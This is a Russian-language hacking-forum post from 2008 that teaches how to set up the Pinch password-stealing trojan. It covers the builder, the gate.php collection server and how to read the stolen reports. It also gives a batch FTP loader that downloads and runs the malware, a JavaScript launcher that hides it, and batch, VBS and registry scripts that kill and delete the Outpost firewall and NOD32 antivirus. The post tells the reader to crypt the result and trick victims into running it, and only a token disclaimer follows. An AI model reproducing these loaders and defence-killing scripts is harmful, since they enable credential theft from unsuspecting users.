Итак сегодня я научу вас настраивать пинч 2.99 от Слеша для начала качаем его здесь (пасс:web-hack.ru)
также нам необхотимо зарегестрировать хостинг на которые будут отсыластя отчеты.Для себя я выбрал wwwtu1.ru
Ок приступим регистрируем хостинг вам отсылают на мыло логин и пасс от фтп-аккаунта заливаем всю папочку gate в htdocs/www и заливаем нашу папочку gate потом выстраиваем chmod на папки 777 на php скрипты 775 (как настроить chmod в Total Commander смотрим тут)
Сделали отлично но ище не все сделано
Открываем билдер пинча и вписываем
Хост: (имя вашего сайта)
Путь:указываем путь к гейту (по умолчанию пишем /gate/gate.php)
E-mail:Ваш имеил
Тема:Тема письма
Имя:Имя файла который будет вам отсылатся
Пример:
Хост:www.test.site.com
Путь:/gate/gate.php
E-mail:myemail@yandex.ru
Тема:Pinch report
Имя:report.bin

После чего впариваем жерве.
Дальше смотрим /gate/rep и видим список отчетов.
Скачиваем их на компютер и открываем парсером!
Вот и все гейт настроен пинч есть.Остается нам его только эго хорошенько закриптовать и все.

Другой метод впаривания состоит в:
Создаем bat лоадер который будет скачивать наш вирус с определенного фтп
Наведу пример

echo off
echo open ftp.****.com>log
txt&&echo login>>log.txt&&echo
password>>log.txt&&echo get file.
exe>>log.txt&&echo bye>>log.txt
ftp -s:log.txt
file.exe
del log.txt

(c)Xakep.ru (Feb 2008(110))

Где ftp.****.com ваш фтпшник
login ваш логин на фтп
password пасс на фтп
file.exe имя файла

Также напишем яваскрипт который будет скрывать наш bat лоадер

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("new.bat", 0);

(с)Xakep.ru (Feb 2008(110))

И джоиним лоадер с яваскриптом получаем новый exe файл.
Впариваем файл жертве и ждем пока скачается.
Вот и все!

Ище также для отрубки антивирусов и файерволов можно использовать вредосносные vbs и js
Подробно про них прочитать можно
здесь и здесь

Настройка gate.php
Итак разберем немного gate.php
Смотрим

$mode = 2;

Что это означает?
Вот например мы хотим чтобы отчеты нам отправлялись на почту либо оставались на фтп одним файлом либо и отсылало отчет на e-mail и оставляло файлом на фтп
1-Отсылать только на мыло
2-Оставлять отчет в папке /reps/ на фтп
3-Отправлять на мыло
Меняем значение $mode на которое вам нужно.
Поехали дальше

$rndatch = FALSE;

Называть отчет рандомно т.е. например когда вам он идет (отчет) то вы получаете название в виде дата_время_ип при значении TRUE вы получите его в виде jksfpfg вот так приблизительно
Значения
False - отрубует рандомное название
True - Включает

$savetodir = TRUE;

Сохранять отчеты в опр. папке на сервере.Это не менять без надобности.

$dirname = "reps";

При указании $savetodir = TRUE; в $dirname указываем имя папки куда будут скидыватся отчеты.

Также отчеты на гейт идут иногда долго иногда неочень все зависит от размера файла репорта )

Проводим Атаку
Итак начнем для начала склепаем десяток vbs и bat скриптов для отключки фаервола и антивиря к примеру я брал Outpost Firewall и Nod32(2.7)
Защита аутпоста неочень сложная поэтому пишем батник

taskkill /IM outpost.exe /F /T

Убиваем процес тут все просто

и напишем небольшой код выгрузки оутпоста для этого создадим в блокноте файл и пишем

set WShell = CreateObject("WScript.Shell")
WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

(с)Antichat.Ru
(c)SecurityLab

Даже незнающий может разобрать на пальцах что он делает.Он выгружает Фаервол аутпоста.Разберем на пальцах кое какие куски

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"

Находит файл outpost.exe

WShell.AppActivate "Agnitum", TRUE

Определяет не скрыта ли папка

WScript.Sleep

Насчет этого скажу что время подвисания компа в ms (милисикундах)
Сохраняем это чадо в *.vbs формате

Дальше удаляем сам файл аутпоста без которого фаер не заработает
Пишем ище один батник

del [ диск :] [ путь] имя_файла [ ...] [ /p] [ /f] [ /s] [ /q] [ /a[ : атрибуты]]

Вот именно по такой форме мы удаляем нужный файл в итоге конфигурируем нам необходимый

del C:\Program Files\Agnitum\Outpost Firewall 1.0\outpost.exe /q /a r a s h

Отсюда видно что у человека стоял Outpost Firewall 1.0
P.S:Пользовался этой статьей читаем там все подробно расписано
Все бронижелет снят пора ампутировать руки = )

У жертвы стоял Нод 32 v 2.7 но защита нода кое какая есть и создаем батник уничтожения процеса антивиря с его переименовкой в fuck.exe и fucker.exe

rename "C:\Program Files\ESET\nod32krn.exe" fucker.exe
rename "C:\Program Files\ESET\nod32kui.exe" fuck.exe
taskkill /IM nod32krn.exe /F /T
taskkill /IM nod32kui.exe /F /T

Пальцы отрезаны движемся дальше.Пишем отключаем службу в реестре.Пишем .reg файл

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NOD32krn]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\NOD32krn]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NOD32krn]
"Start"=dword:00000004

И отключаем шелл оболочку

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nod32kui"="\"C:\\Program Files\\Eset\\nod32kui.exe\" /WAITSERVICE"

Создаем ище один батник с удалением необходимых ноду файлов.

del C:\Program Files\ESET\nod32krn.exe /q /a r a s h
del C:\Program Files\ESET\nod32kui.exe /q /a r a s h

Руки ампутированы а это все что нам нужно было крепим любым джойнером файлы для ампутации и ставим на наш фтп (например BEJoiner 1.0 со встроеным UPackom)
Создаем лоадер и будем грузить этот файл с нашего фтп и создаем второй лоадер который джойним к нашим инструментам для ампутации ) второй лоадер будет грузить уже наш пинч.Также цепляем батник принудительной перезагрузки который будет перезагружать комп.При желании криптуем наш получившийся .ехе для ампутации и впариваем жертве ))) и ждем просто ждем.Вот мы создали целый хирургически кабинет с небольшим весом который очень поможет нам.

Даный материал выложен в целях ознакомления.Ответствености за последствия автор никакой не несет.
PS:Не забывай что приетом ты попадаеш под статью 273 УК РФ.
Удачи!

Отредактировано M1St (2008-04-19 18:03:26)